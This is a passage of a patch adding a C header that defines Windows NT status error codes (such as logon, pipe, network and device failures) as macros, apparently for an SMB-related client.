++#define NT_STATUS_MEMBER_IN_GROUP 0xC0000000 | 0x0067
++#define NT_STATUS_MEMBER_NOT_IN_GROUP 0xC0000000 | 0x0068
++#define NT_STATUS_LAST_ADMIN 0xC0000000 | 0x0069
++#define NT_STATUS_WRONG_PASSWORD 0xC0000000 | 0x006a
++#define NT_STATUS_ILL_FORMED_PASSWORD 0xC0000000 | 0x006b
++#define NT_STATUS_PASSWORD_RESTRICTION 0xC0000000 | 0x006c
++#define NT_STATUS_LOGON_FAILURE 0xC0000000 | 0x006d
++#define NT_STATUS_ACCOUNT_RESTRICTION 0xC0000000 | 0x006e
++#define NT_STATUS_INVALID_LOGON_HOURS 0xC0000000 | 0x006f
++#define NT_STATUS_INVALID_WORKSTATION 0xC0000000 | 0x0070
++#define NT_STATUS_PASSWORD_EXPIRED 0xC0000000 | 0x0071
++#define NT_STATUS_ACCOUNT_DISABLED 0xC0000000 | 0x0072
++#define NT_STATUS_NONE_MAPPED 0xC0000000 | 0x0073
++#define NT_STATUS_TOO_MANY_LUIDS_REQUESTED 0xC0000000 | 0x0074
++#define NT_STATUS_LUIDS_EXHAUSTED 0xC0000000 | 0x0075
++#define NT_STATUS_INVALID_SUB_AUTHORITY 0xC0000000 | 0x0076
++#define NT_STATUS_INVALID_ACL 0xC0000000 | 0x0077
++#define NT_STATUS_INVALID_SID 0xC0000000 | 0x0078
++#define NT_STATUS_INVALID_SECURITY_DESCR 0xC0000000 | 0x0079
++#define NT_STATUS_PROCEDURE_NOT_FOUND 0xC0000000 | 0x007a
++#define NT_STATUS_INVALID_IMAGE_FORMAT 0xC0000000 | 0x007b
++#define NT_STATUS_NO_TOKEN 0xC0000000 | 0x007c
++#define NT_STATUS_BAD_INHERITANCE_ACL 0xC0000000 | 0x007d
++#define NT_STATUS_RANGE_NOT_LOCKED 0xC0000000 | 0x007e
++#define NT_STATUS_DISK_FULL 0xC0000000 | 0x007f
++#define NT_STATUS_SERVER_DISABLED 0xC0000000 | 0x0080
++#define NT_STATUS_SERVER_NOT_DISABLED 0xC0000000 | 0x0081
++#define NT_STATUS_TOO_MANY_GUIDS_REQUESTED 0xC0000000 | 0x0082
++#define NT_STATUS_GUIDS_EXHAUSTED 0xC0000000 | 0x0083
++#define NT_STATUS_INVALID_ID_AUTHORITY 0xC0000000 | 0x0084
++#define NT_STATUS_AGENTS_EXHAUSTED 0xC0000000 | 0x0085
++#define NT_STATUS_INVALID_VOLUME_LABEL 0xC0000000 | 0x0086
++#define NT_STATUS_SECTION_NOT_EXTENDED 0xC0000000 | 0x0087
++#define NT_STATUS_NOT_MAPPED_DATA 0xC0000000 | 0x0088
++#define NT_STATUS_RESOURCE_DATA_NOT_FOUND 0xC0000000 | 0x0089
++#define NT_STATUS_RESOURCE_TYPE_NOT_FOUND 0xC0000000 | 0x008a
++#define NT_STATUS_RESOURCE_NAME_NOT_FOUND 0xC0000000 | 0x008b
++#define NT_STATUS_ARRAY_BOUNDS_EXCEEDED 0xC0000000 | 0x008c
++#define NT_STATUS_FLOAT_DENORMAL_OPERAND 0xC0000000 | 0x008d
++#define NT_STATUS_FLOAT_DIVIDE_BY_ZERO 0xC0000000 | 0x008e
++#define NT_STATUS_FLOAT_INEXACT_RESULT 0xC0000000 | 0x008f
++#define NT_STATUS_FLOAT_INVALID_OPERATION 0xC0000000 | 0x0090
++#define NT_STATUS_FLOAT_OVERFLOW 0xC0000000 | 0x0091
++#define NT_STATUS_FLOAT_STACK_CHECK 0xC0000000 | 0x0092
++#define NT_STATUS_FLOAT_UNDERFLOW 0xC0000000 | 0x0093
++#define NT_STATUS_INTEGER_DIVIDE_BY_ZERO 0xC0000000 | 0x0094
++#define NT_STATUS_INTEGER_OVERFLOW 0xC0000000 | 0x0095
++#define NT_STATUS_PRIVILEGED_INSTRUCTION 0xC0000000 | 0x0096
++#define NT_STATUS_TOO_MANY_PAGING_FILES 0xC0000000 | 0x0097
++#define NT_STATUS_FILE_INVALID 0xC0000000 | 0x0098
++#define NT_STATUS_ALLOTTED_SPACE_EXCEEDED 0xC0000000 | 0x0099
++#define NT_STATUS_INSUFFICIENT_RESOURCES 0xC0000000 | 0x009a
++#define NT_STATUS_DFS_EXIT_PATH_FOUND 0xC0000000 | 0x009b
++#define NT_STATUS_DEVICE_DATA_ERROR 0xC0000000 | 0x009c
++#define NT_STATUS_DEVICE_NOT_CONNECTED 0xC0000000 | 0x009d
++#define NT_STATUS_DEVICE_POWER_FAILURE 0xC0000000 | 0x009e
++#define NT_STATUS_FREE_VM_NOT_AT_BASE 0xC0000000 | 0x009f
++#define NT_STATUS_MEMORY_NOT_ALLOCATED 0xC0000000 | 0x00a0
++#define NT_STATUS_WORKING_SET_QUOTA 0xC0000000 | 0x00a1
++#define NT_STATUS_MEDIA_WRITE_PROTECTED 0xC0000000 | 0x00a2
++#define NT_STATUS_DEVICE_NOT_READY 0xC0000000 | 0x00a3
++#define NT_STATUS_INVALID_GROUP_ATTRIBUTES 0xC0000000 | 0x00a4
++#define NT_STATUS_BAD_IMPERSONATION_LEVEL 0xC0000000 | 0x00a5
++#define NT_STATUS_CANT_OPEN_ANONYMOUS 0xC0000000 | 0x00a6
++#define NT_STATUS_BAD_VALIDATION_CLASS 0xC0000000 | 0x00a7
++#define NT_STATUS_BAD_TOKEN_TYPE 0xC0000000 | 0x00a8
++#define NT_STATUS_BAD_MASTER_BOOT_RECORD 0xC0000000 | 0x00a9
++#define NT_STATUS_INSTRUCTION_MISALIGNMENT 0xC0000000 | 0x00aa
++#define NT_STATUS_INSTANCE_NOT_AVAILABLE 0xC0000000 | 0x00ab
++#define NT_STATUS_PIPE_NOT_AVAILABLE 0xC0000000 | 0x00ac
++#define NT_STATUS_INVALID_PIPE_STATE 0xC0000000 | 0x00ad
++#define NT_STATUS_PIPE_BUSY 0xC0000000 | 0x00ae
++#define NT_STATUS_ILLEGAL_FUNCTION 0xC0000000 | 0x00af
++#define NT_STATUS_PIPE_DISCONNECTED 0xC0000000 | 0x00b0
++#define NT_STATUS_PIPE_CLOSING 0xC0000000 | 0x00b1
++#define NT_STATUS_PIPE_CONNECTED 0xC0000000 | 0x00b2
++#define NT_STATUS_PIPE_LISTENING 0xC0000000 | 0x00b3
++#define NT_STATUS_INVALID_READ_MODE 0xC0000000 | 0x00b4
++#define NT_STATUS_IO_TIMEOUT 0xC0000000 | 0x00b5
++#define NT_STATUS_FILE_FORCED_CLOSED 0xC0000000 | 0x00b6
++#define NT_STATUS_PROFILING_NOT_STARTED 0xC0000000 | 0x00b7
++#define NT_STATUS_PROFILING_NOT_STOPPED 0xC0000000 | 0x00b8
++#define NT_STATUS_COULD_NOT_INTERPRET 0xC0000000 | 0x00b9
++#define NT_STATUS_FILE_IS_A_DIRECTORY 0xC0000000 | 0x00ba
++#define NT_STATUS_NOT_SUPPORTED 0xC0000000 | 0x00bb
++#define NT_STATUS_REMOTE_NOT_LISTENING 0xC0000000 | 0x00bc
++#define NT_STATUS_DUPLICATE_NAME 0xC0000000 | 0x00bd
++#define NT_STATUS_BAD_NETWORK_PATH 0xC0000000 | 0x00be
++#define NT_STATUS_NETWORK_BUSY 0xC0000000 | 0x00bf
++#define NT_STATUS_DEVICE_DOES_NOT_EXIST 0xC0000000 | 0x00c0
++#define NT_STATUS_TOO_MANY_COMMANDS 0xC0000000 | 0x00c1
++#define NT_STATUS_ADAPTER_HARDWARE_ERROR 0xC0000000 | 0x00c2
++#define NT_STATUS_INVALID_NETWORK_RESPONSE 0xC0000000 | 0x00c3
++#define NT_STATUS_UNEXPECTED_NETWORK_ERROR 0xC0000000 | 0x00c4
++#define NT_STATUS_BAD_REMOTE_ADAPTER 0xC0000000 | 0x00c5
++#define NT_STATUS_PRINT_QUEUE_FULL 0xC0000000 | 0x00c6
++#define NT_STATUS_NO_SPOOL_SPACE 0xC0000000 | 0x00c7
++#define NT_STATUS_PRINT_CANCELLED 0xC0000000 | 0x00c8
++#define NT_STATUS_NETWORK_NAME_DELETED 0xC0000000 | 0x00c9
++#define NT_STATUS_NETWORK_ACCESS_DENIED 0xC0000000 | 0x00ca
++#define NT_STATUS_BAD_DEVICE_TYPE 0xC0000000 | 0x00cb
++#define NT_STATUS_BAD_NETWORK_NAME 0xC0000000 | 0x00cc
++#define NT_STATUS_TOO_MANY_NAMES 0xC0000000 | 0x00cd
++#define NT_STATUS_TOO_MANY_SESSIONS 0xC0000000 | 0x00ce
++#define NT_STATUS_SHARING_PAUSED 0xC0000000 | 0x00cf
++#define NT_STATUS_REQUEST_NOT_ACCEPTED 0xC0000000 | 0x00d0
++#define NT_STATUS_REDIRECTOR_PAUSED 0xC0000000 | 0x00d1
++#define NT_STATUS_NET_WRITE_FAULT 0xC0000000 | 0x00d2
++#define NT_STATUS_PROFILING_AT_LIMIT 0xC0000000 | 0x00d3
++#define NT_STATUS_NOT_SAME_DEVICE 0xC0000000 | 0x00d4
++#define NT_STATUS_FILE_RENAMED 0xC0000000 | 0x00d5
++#define NT_STATUS_VIRTUAL_CIRCUIT_CLOSED 0xC0000000 | 0x00d6
++#define NT_STATUS_NO_SECURITY_ON_OBJECT 0xC0000000 | 0x00d7
++#define NT_STATUS_CANT_WAIT 0xC0000000 | 0x00d8
++#define NT_STATUS_PIPE_EMPTY 0xC0000000 | 0x00d9
++#define NT_STATUS_CANT_ACCESS_DOMAIN_INFO 0xC0000000 | 0x00da
++#define NT_STATUS_CANT_TERMINATE_SELF 0xC0000000 | 0x00db
++#define NT_STATUS_INVALID_SERVER_STATE 0xC0000000 | 0x00dc
++#define NT_STATUS_INVALID_DOMAIN_STATE 0xC0000000 | 0x00dd
++#define NT_STATUS_INVALID_DOMAIN_ROLE 0xC0000000 | 0x00de
++#define NT_STATUS_NO_SUCH_DOMAIN 0xC0000000 | 0x00df
++#define NT_STATUS_DOMAIN_EXISTS 0xC0000000 | 0x00e0
++#define NT_STATUS_DOMAIN_LIMIT_EXCEEDED 0xC0000000 | 0x00e1
++#define NT_STATUS_OPLOCK_NOT_GRANTED 0xC0000000 | 0x00e2
++#define NT_STATUS_INVALID_OPLOCK_PROTOCOL 0xC0000000 | 0x00e3
++#define NT_STATUS_INTERNAL_DB_CORRUPTION 0xC0000000 | 0x00e4
++#define NT_STATUS_INTERNAL_ERROR 0xC0000000 | 0x00e5
++#define NT_STATUS_GENERIC_NOT_MAPPED 0xC0000000 | 0x00e6
++#define NT_STATUS_BAD_DESCRIPTOR_FORMAT 0xC0000000 | 0x00e7
++#define NT_STATUS_INVALID_USER_BUFFER 0xC0000000 | 0x00e8
++#define NT_STATUS_UNEXPECTED_IO_ERROR 0xC0000000 | 0x00e9
++#define NT_STATUS_UNEXPECTED_MM_CREATE_ERR 0xC0000000 | 0x00ea
++#define NT_STATUS_UNEXPECTED_MM_MAP_ERROR 0xC0000000 | 0x00eb
++#define NT_STATUS_UNEXPECTED_MM_EXTEND_ERR 0xC0000000 | 0x00ec
++#define NT_STATUS_NOT_LOGON_PROCESS 0xC0000000 | 0x00ed
++#define NT_STATUS_LOGON_SESSION_EXISTS 0xC0000000 | 0x00ee
++#define NT_STATUS_INVALID_PARAMETER_1 0xC0000000 | 0x00ef
++#define NT_STATUS_INVALID_PARAMETER_2 0xC0000000 | 0x00f0
++#define NT_STATUS_INVALID_PARAMETER_3 0xC0000000 | 0x00f1
++#define NT_STATUS_INVALID_PARAMETER_4 0xC0000000 | 0x00f2
++#define NT_STATUS_INVALID_PARAMETER_5 0xC0000000 | 0x00f3
++#define NT_STATUS_INVALID_PARAMETER_6 0xC0000000 | 0x00f4
++#define NT_STATUS_INVALID_PARAMETER_7 0xC0000000 | 0x00f5
++#define NT_STATUS_INVALID_PARAMETER_8 0xC0000000 | 0x00f6
++#define NT_STATUS_INVALID_PARAMETER_9 0xC0000000 | 0x00f7
++#define NT_STATUS_INVALID_PARAMETER_10 0xC0000000 | 0x00f8
++#define NT_STATUS_INVALID_PARAMETER_11 0xC0000000 | 0x00f9
++#define NT_STATUS_INVALID_PARAMETER_12 0xC0000000 | 0x00fa
++#define NT_STATUS_REDIRECTOR_NOT_STARTED 0xC0000000 | 0x00fb
++#define NT_STATUS_REDIRECTOR_STARTED 0xC0000000 | 0x00fc
++#define NT_STATUS_STACK_OVERFLOW 0xC0000000 | 0x00fd
++#define NT_STATUS_NO_SUCH_PACKAGE 0xC0000000 | 0x00fe
++#define NT_STATUS_BAD_FUNCTION_TABLE 0xC0000000 | 0x00ff
++#define NT_STATUS_DIRECTORY_NOT_EMPTY 0xC0000000 | 0x0101
++#define NT_STATUS_FILE_CORRUPT_ERROR 0xC0000000 | 0x0102
++#define NT_STATUS_NOT_A_DIRECTORY 0xC0000000 | 0x0103
++#define NT_STATUS_BAD_LOGON_SESSION_STATE 0xC0000000 | 0x0104
++#define NT_STATUS_LOGON_SESSION_COLLISION 0xC0000000 | 0x0105
++#define NT_STATUS_NAME_TOO_LONG 0xC0000000 | 0x0106
++#define NT_STATUS_FILES_OPEN 0xC0000000 | 0x0107
++#define NT_STATUS_CONNECTION_IN_USE 0xC0000000 | 0x0108
++#define NT_STATUS_MESSAGE_NOT_FOUND 0xC0000000 | 0x0109
++#define NT_STATUS_PROCESS_IS_TERMINATING 0xC0000000 | 0x010a
++#define NT_STATUS_INVALID_LOGON_TYPE 0xC0000000 | 0x010b
++#define NT_STATUS_NO_GUID_TRANSLATION 0xC0000000 | 0x010c
++#define NT_STATUS_CANNOT_IMPERSONATE 0xC0000000 | 0x010d
++#define NT_STATUS_IMAGE_ALREADY_LOADED 0xC0000000 | 0x010e
++#define NT_STATUS_ABIOS_NOT_PRESENT 0xC0000000 | 0x010f
++#define NT_STATUS_ABIOS_LID_NOT_EXIST 0xC0000000 | 0x0110
++#define NT_STATUS_ABIOS_LID_ALREADY_OWNED 0xC0000000 | 0x0111
++#define NT_STATUS_ABIOS_NOT_LID_OWNER 0xC0000000 | 0x0112
++#define NT_STATUS_ABIOS_INVALID_COMMAND 0xC0000000 | 0x0113
++#define NT_STATUS_ABIOS_INVALID_LID 0xC0000000 | 0x0114
++#define NT_STATUS_ABIOS_SELECTOR_NOT_AVAILABLE 0xC0000000 | 0x0115
++#define NT_STATUS_ABIOS_INVALID_SELECTOR 0xC0000000 | 0x0116
++#define NT_STATUS_NO_LDT 0xC0000000 | 0x0117
++#define NT_STATUS_INVALID_LDT_SIZE 0xC0000000 | 0x0118
++#define NT_STATUS_INVALID_LDT_OFFSET 0xC0000000 | 0x0119
++#define NT_STATUS_INVALID_LDT_DESCRIPTOR 0xC0000000 | 0x011a
++#define NT_STATUS_INVALID_IMAGE_NE_FORMAT 0xC0000000 | 0x011b
++#define NT_STATUS_RXACT_INVALID_STATE 0xC0000000 | 0x011c
++#define NT_STATUS_RXACT_COMMIT_FAILURE 0xC0000000 | 0x011d
++#define NT_STATUS_MAPPED_FILE_SIZE_ZERO 0xC0000000 | 0x011e
++#define NT_STATUS_TOO_MANY_OPENED_FILES 0xC0000000 | 0x011f
++#define NT_STATUS_CANCELLED 0xC0000000 | 0x0120
++#define NT_STATUS_CANNOT_DELETE 0xC0000000 | 0x0121
++#define NT_STATUS_INVALID_COMPUTER_NAME 0xC0000000 | 0x0122
++#define NT_STATUS_FILE_DELETED 0xC0000000 | 0x0123
++#define NT_STATUS_SPECIAL_ACCOUNT 0xC0000000 | 0x0124
++#define NT_STATUS_SPECIAL_GROUP 0xC0000000 | 0x0125
++#define NT_STATUS_SPECIAL_USER 0xC0000000 | 0x0126
++#define NT_STATUS_MEMBERS_PRIMARY_GROUP 0xC0000000 | 0x0127
++#define NT_STATUS_FILE_CLOSED 0xC0000000 | 0x0128
++#define NT_STATUS_TOO_MANY_THREADS 0xC0000000 | 0x0129
++#define NT_STATUS_THREAD_NOT_IN_PROCESS 0xC0000000 | 0x012a
++#define NT_STATUS_TOKEN_ALREADY_IN_USE 0xC0000000 | 0x012b
++#define NT_STATUS_PAGEFILE_QUOTA_EXCEEDED 0xC0000000 | 0x012c
++#define NT_STATUS_COMMITMENT_LIMIT 0xC0000000 | 0x012d
++#define NT_STATUS_INVALID_IMAGE_LE_FORMAT 0xC0000000 | 0x012e
++#define NT_STATUS_INVALID_IMAGE_NOT_MZ 0xC0000000 | 0x012f
++#define NT_STATUS_INVALID_IMAGE_PROTECT 0xC0000000 | 0x0130
++#define NT_STATUS_INVALID_IMAGE_WIN_16 0xC0000000 | 0x0131
++#define NT_STATUS_LOGON_SERVER_CONFLICT 0xC0000000 | 0x0132
++#define NT_STATUS_TIME_DIFFERENCE_AT_DC 0xC0000000 | 0x0133
++#define NT_STATUS_SYNCHRONIZATION_REQUIRED 0xC0000000 | 0x0134
++#define NT_STATUS_DLL_NOT_FOUND 0xC0000000 | 0x0135
++#define NT_STATUS_OPEN_FAILED 0xC0000000 | 0x0136
++#define NT_STATUS_IO_PRIVILEGE_FAILED 0xC0000000 | 0x0137
++#define NT_STATUS_ORDINAL_NOT_FOUND 0xC0000000 | 0x0138
++#define NT_STATUS_ENTRYPOINT_NOT_FOUND 0xC0000000 | 0x0139
++#define NT_STATUS_CONTROL_C_EXIT 0xC0000000 | 0x013a
++#define NT_STATUS_LOCAL_DISCONNECT 0xC0000000 | 0x013b
++#define NT_STATUS_REMOTE_DISCONNECT 0xC0000000 | 0x013c
++#define NT_STATUS_REMOTE_RESOURCES 0xC0000000 | 0x013d
++#define NT_STATUS_LINK_FAILED 0xC0000000 | 0x013e
++#define NT_STATUS_LINK_TIMEOUT 0xC0000000 | 0x013f
++#define NT_STATUS_INVALID_CONNECTION 0xC0000000 | 0x0140
++#define NT_STATUS_INVALID_ADDRESS 0xC0000000 | 0x0141
++#define NT_STATUS_DLL_INIT_FAILED 0xC0000000 | 0x0142
++#define NT_STATUS_MISSING_SYSTEMFILE 0xC0000000 | 0x0143
++#define NT_STATUS_UNHANDLED_EXCEPTION 0xC0000000 | 0x0144
++#define NT_STATUS_APP_INIT_FAILURE 0xC0000000 | 0x0145
++#define NT_STATUS_PAGEFILE_CREATE_FAILED 0xC0000000 | 0x0146
++#define NT_STATUS_NO_PAGEFILE 0xC0000000 | 0x0147
++#define NT_STATUS_INVALID_LEVEL 0xC0000000 | 0x0148
++#define NT_STATUS_WRONG_PASSWORD_CORE 0xC0000000 | 0x0149
++#define NT_STATUS_ILLEGAL_FLOAT_CONTEXT 0xC0000000 | 0x014a
++#define NT_STATUS_PIPE_BROKEN 0xC0000000 | 0x014b
++#define NT_STATUS_REGISTRY_CORRUPT 0xC0000000 | 0x014c
++#define NT_STATUS_REGISTRY_IO_FAILED 0xC0000000 | 0x014d
++#define NT_STATUS_NO_EVENT_PAIR 0xC0000000 | 0x014e
++#define NT_STATUS_UNRECOGNIZED_VOLUME 0xC0000000 | 0x014f
++#define NT_STATUS_SERIAL_NO_DEVICE_INITED 0xC0000000 | 0x0150
++#define NT_STATUS_NO_SUCH_ALIAS 0xC0000000 | 0x0151
++#define NT_STATUS_MEMBER_NOT_IN_ALIAS 0xC0000000 | 0x0152
++#define NT_STATUS_MEMBER_IN_ALIAS 0xC0000000 | 0x0153
++#define NT_STATUS_ALIAS_EXISTS 0xC0000000 | 0x0154
++#define NT_STATUS_LOGON_NOT_GRANTED 0xC0000000 | 0x0155
++#define NT_STATUS_TOO_MANY_SECRETS 0xC0000000 | 0x0156
++#define NT_STATUS_SECRET_TOO_LONG 0xC0000000 | 0x0157
++#define NT_STATUS_INTERNAL_DB_ERROR 0xC0000000 | 0x0158
++#define NT_STATUS_FULLSCREEN_MODE 0xC0000000 | 0x0159
++#define NT_STATUS_TOO_MANY_CONTEXT_IDS 0xC0000000 | 0x015a
++#define NT_STATUS_LOGON_TYPE_NOT_GRANTED 0xC0000000 | 0x015b
++#define NT_STATUS_NOT_REGISTRY_FILE 0xC0000000 | 0x015c
++#define NT_STATUS_NT_CROSS_ENCRYPTION_REQUIRED 0xC0000000 | 0x015d
++#define NT_STATUS_DOMAIN_CTRLR_CONFIG_ERROR 0xC0000000 | 0x015e
++#define NT_STATUS_FT_MISSING_MEMBER 0xC0000000 | 0x015f
++#define NT_STATUS_ILL_FORMED_SERVICE_ENTRY 0xC0000000 | 0x0160
++#define NT_STATUS_ILLEGAL_CHARACTER 0xC0000000 | 0x0161
++#define NT_STATUS_UNMAPPABLE_CHARACTER 0xC0000000 | 0x0162
++#define NT_STATUS_UNDEFINED_CHARACTER 0xC0000000 | 0x0163
++#define NT_STATUS_FLOPPY_VOLUME 0xC0000000 | 0x0164
++#define NT_STATUS_FLOPPY_ID_MARK_NOT_FOUND 0xC0000000 | 0x0165
++#define NT_STATUS_FLOPPY_WRONG_CYLINDER 0xC0000000 | 0x0166
++#define NT_STATUS_FLOPPY_UNKNOWN_ERROR 0xC0000000 | 0x0167
++#define NT_STATUS_FLOPPY_BAD_REGISTERS 0xC0000000 | 0x0168
++#define NT_STATUS_DISK_RECALIBRATE_FAILED 0xC0000000 | 0x0169
++#define NT_STATUS_DISK_OPERATION_FAILED 0xC0000000 | 0x016a
++#define NT_STATUS_DISK_RESET_FAILED 0xC0000000 | 0x016b
++#define NT_STATUS_SHARED_IRQ_BUSY 0xC0000000 | 0x016c
++#define NT_STATUS_FT_ORPHANING 0xC0000000 | 0x016d
++#define NT_STATUS_PARTITION_FAILURE 0xC0000000 | 0x0172
++#define NT_STATUS_INVALID_BLOCK_LENGTH 0xC0000000 | 0x0173
++#define NT_STATUS_DEVICE_NOT_PARTITIONED 0xC0000000 | 0x0174
++#define NT_STATUS_UNABLE_TO_LOCK_MEDIA 0xC0000000 | 0x0175
++#define NT_STATUS_UNABLE_TO_UNLOAD_MEDIA 0xC0000000 | 0x0176
++#define NT_STATUS_EOM_OVERFLOW 0xC0000000 | 0x0177
++#define NT_STATUS_NO_MEDIA 0xC0000000 | 0x0178
++#define NT_STATUS_NO_SUCH_MEMBER 0xC0000000 | 0x017a
++#define NT_STATUS_INVALID_MEMBER 0xC0000000 | 0x017b
++#define NT_STATUS_KEY_DELETED 0xC0000000 | 0x017c
++#define NT_STATUS_NO_LOG_SPACE 0xC0000000 | 0x017d
++#define NT_STATUS_TOO_MANY_SIDS 0xC0000000 | 0x017e
++#define NT_STATUS_LM_CROSS_ENCRYPTION_REQUIRED 0xC0000000 | 0x017f
++#define NT_STATUS_KEY_HAS_CHILDREN 0xC0000000 | 0x0180
++#define NT_STATUS_CHILD_MUST_BE_VOLATILE 0xC0000000 | 0x0181
++#define NT_STATUS_DEVICE_CONFIGURATION_ERROR 0xC0000000 | 0x0182
++#define NT_STATUS_DRIVER_INTERNAL_ERROR 0xC0000000 | 0x0183
++#define NT_STATUS_INVALID_DEVICE_STATE 0xC0000000 | 0x0184
++#define NT_STATUS_IO_DEVICE_ERROR 0xC0000000 | 0x0185
++#define NT_STATUS_DEVICE_PROTOCOL_ERROR 0xC0000000 | 0x0186
++#define NT_STATUS_BACKUP_CONTROLLER 0xC0000000 | 0x0187
++#define NT_STATUS_LOG_FILE_FULL 0xC0000000 | 0x0188
++#define NT_STATUS_TOO_LATE 0xC0000000 | 0x0189
++#define NT_STATUS_NO_TRUST_LSA_SECRET 0xC0000000 | 0x018a
++#define NT_STATUS_NO_TRUST_SAM_ACCOUNT 0xC0000000 | 0x018b
++#define NT_STATUS_TRUSTED_DOMAIN_FAILURE 0xC0000000 | 0x018c
++#define NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE 0xC0000000 | 0x018d
++#define NT_STATUS_EVENTLOG_FILE_CORRUPT 0xC0000000 | 0x018e
++#define NT_STATUS_EVENTLOG_CANT_START 0xC0000000 | 0x018f
++#define NT_STATUS_TRUST_FAILURE 0xC0000000 | 0x0190
++#define NT_STATUS_MUTANT_LIMIT_EXCEEDED 0xC0000000 | 0x0191
++#define NT_STATUS_NETLOGON_NOT_STARTED 0xC0000000 | 0x0192
++#define NT_STATUS_ACCOUNT_EXPIRED 0xC0000000 | 0x0193
++#define NT_STATUS_POSSIBLE_DEADLOCK 0xC0000000 | 0x0194
++#define NT_STATUS_NETWORK_CREDENTIAL_CONFLICT 0xC0000000 | 0x0195
++#define NT_STATUS_REMOTE_SESSION_LIMIT 0xC0000000 | 0x0196
++#define NT_STATUS_EVENTLOG_FILE_CHANGED 0xC0000000 | 0x0197
++#define NT_STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT 0xC0000000 | 0x0198
++#define NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT 0xC0000000 | 0x0199
++#define NT_STATUS_NOLOGON_SERVER_TRUST_ACCOUNT 0xC0000000 | 0x019a
++#define NT_STATUS_DOMAIN_TRUST_INCONSISTENT 0xC0000000 | 0x019b
++#define NT_STATUS_FS_DRIVER_REQUIRED 0xC0000000 | 0x019c
++#define NT_STATUS_NO_USER_SESSION_KEY 0xC0000000 | 0x0202
++#define NT_STATUS_USER_SESSION_DELETED 0xC0000000 | 0x0203
++#define NT_STATUS_RESOURCE_LANG_NOT_FOUND 0xC0000000 | 0x0204
++#define NT_STATUS_INSUFF_SERVER_RESOURCES 0xC0000000 | 0x0205
++#define NT_STATUS_INVALID_BUFFER_SIZE 0xC0000000 | 0x0206
++#define NT_STATUS_INVALID_ADDRESS_COMPONENT 0xC0000000 | 0x0207
++#define NT_STATUS_INVALID_ADDRESS_WILDCARD 0xC0000000 | 0x0208
++#define NT_STATUS_TOO_MANY_ADDRESSES 0xC0000000 | 0x0209
++#define NT_STATUS_ADDRESS_ALREADY_EXISTS 0xC0000000 | 0x020a
++#define NT_STATUS_ADDRESS_CLOSED 0xC0000000 | 0x020b
++#define NT_STATUS_CONNECTION_DISCONNECTED 0xC0000000 | 0x020c
++#define NT_STATUS_CONNECTION_RESET 0xC0000000 | 0x020d
++#define NT_STATUS_TOO_MANY_NODES 0xC0000000 | 0x020e
++#define NT_STATUS_TRANSACTION_ABORTED 0xC0000000 | 0x020f
++#define NT_STATUS_TRANSACTION_TIMED_OUT 0xC0000000 | 0x0210
++#define NT_STATUS_TRANSACTION_NO_RELEASE 0xC0000000 | 0x0211
++#define NT_STATUS_TRANSACTION_NO_MATCH 0xC0000000 | 0x0212
++#define NT_STATUS_TRANSACTION_RESPONDED 0xC0000000 | 0x0213
++#define NT_STATUS_TRANSACTION_INVALID_ID 0xC0000000 | 0x0214
++#define NT_STATUS_TRANSACTION_INVALID_TYPE 0xC0000000 | 0x0215
++#define NT_STATUS_NOT_SERVER_SESSION 0xC0000000 | 0x0216
++#define NT_STATUS_NOT_CLIENT_SESSION 0xC0000000 | 0x0217
++#define NT_STATUS_CANNOT_LOAD_REGISTRY_FILE 0xC0000000 | 0x0218
++#define NT_STATUS_DEBUG_ATTACH_FAILED 0xC0000000 | 0x0219
++#define NT_STATUS_SYSTEM_PROCESS_TERMINATED 0xC0000000 | 0x021a
++#define NT_STATUS_DATA_NOT_ACCEPTED 0xC0000000 | 0x021b
++#define NT_STATUS_NO_BROWSER_SERVERS_FOUND 0xC0000000 | 0x021c
++#define NT_STATUS_VDM_HARD_ERROR 0xC0000000 | 0x021d
++#define NT_STATUS_DRIVER_CANCEL_TIMEOUT 0xC0000000 | 0x021e
++#define NT_STATUS_REPLY_MESSAGE_MISMATCH 0xC0000000 | 0x021f
++#define NT_STATUS_MAPPED_ALIGNMENT 0xC0000000 | 0x0220
++#define NT_STATUS_IMAGE_CHECKSUM_MISMATCH 0xC0000000 | 0x0221
++#define NT_STATUS_LOST_WRITEBEHIND_DATA 0xC0000000 | 0x0222
++#define NT_STATUS_CLIENT_SERVER_PARAMETERS_INVALID 0xC0000000 | 0x0223
++#define NT_STATUS_PASSWORD_MUST_CHANGE 0xC0000000 | 0x0224
++#define NT_STATUS_NOT_FOUND 0xC0000000 | 0x0225
++#define NT_STATUS_NOT_TINY_STREAM 0xC0000000 | 0x0226
++#define NT_STATUS_RECOVERY_FAILURE 0xC0000000 | 0x0227
++#define NT_STATUS_STACK_OVERFLOW_READ 0xC0000000 | 0x0228
++#define NT_STATUS_FAIL_CHECK 0xC0000000 | 0x0229
++#define NT_STATUS_DUPLICATE_OBJECTID 0xC0000000 | 0x022a
++#define NT_STATUS_OBJECTID_EXISTS 0xC0000000 | 0x022b
++#define NT_STATUS_CONVERT_TO_LARGE 0xC0000000 | 0x022c
++#define NT_STATUS_RETRY 0xC0000000 | 0x022d
++#define NT_STATUS_FOUND_OUT_OF_SCOPE 0xC0000000 | 0x022e
++#define NT_STATUS_ALLOCATE_BUCKET 0xC0000000 | 0x022f
++#define NT_STATUS_PROPSET_NOT_FOUND 0xC0000000 | 0x0230
++#define NT_STATUS_MARSHALL_OVERFLOW 0xC0000000 | 0x0231
++#define NT_STATUS_INVALID_VARIANT 0xC0000000 | 0x0232
++#define NT_STATUS_DOMAIN_CONTROLLER_NOT_FOUND 0xC0000000 | 0x0233
++#define NT_STATUS_ACCOUNT_LOCKED_OUT 0xC0000000 | 0x0234
++#define NT_STATUS_HANDLE_NOT_CLOSABLE 0xC0000000 | 0x0235
++#define NT_STATUS_CONNECTION_REFUSED 0xC0000000 | 0x0236
++#define NT_STATUS_GRACEFUL_DISCONNECT 0xC0000000 | 0x0237
++#define NT_STATUS_ADDRESS_ALREADY_ASSOCIATED 0xC0000000 | 0x0238
++#define NT_STATUS_ADDRESS_NOT_ASSOCIATED 0xC0000000 | 0x0239
++#define NT_STATUS_CONNECTION_INVALID 0xC0000000 | 0x023a
++#define NT_STATUS_CONNECTION_ACTIVE 0xC0000000 | 0x023b
++#define NT_STATUS_NETWORK_UNREACHABLE 0xC0000000 | 0x023c
++#define NT_STATUS_HOST_UNREACHABLE 0xC0000000 | 0x023d
++#define NT_STATUS_PROTOCOL_UNREACHABLE 0xC0000000 | 0x023e
++#define NT_STATUS_PORT_UNREACHABLE 0xC0000000 | 0x023f
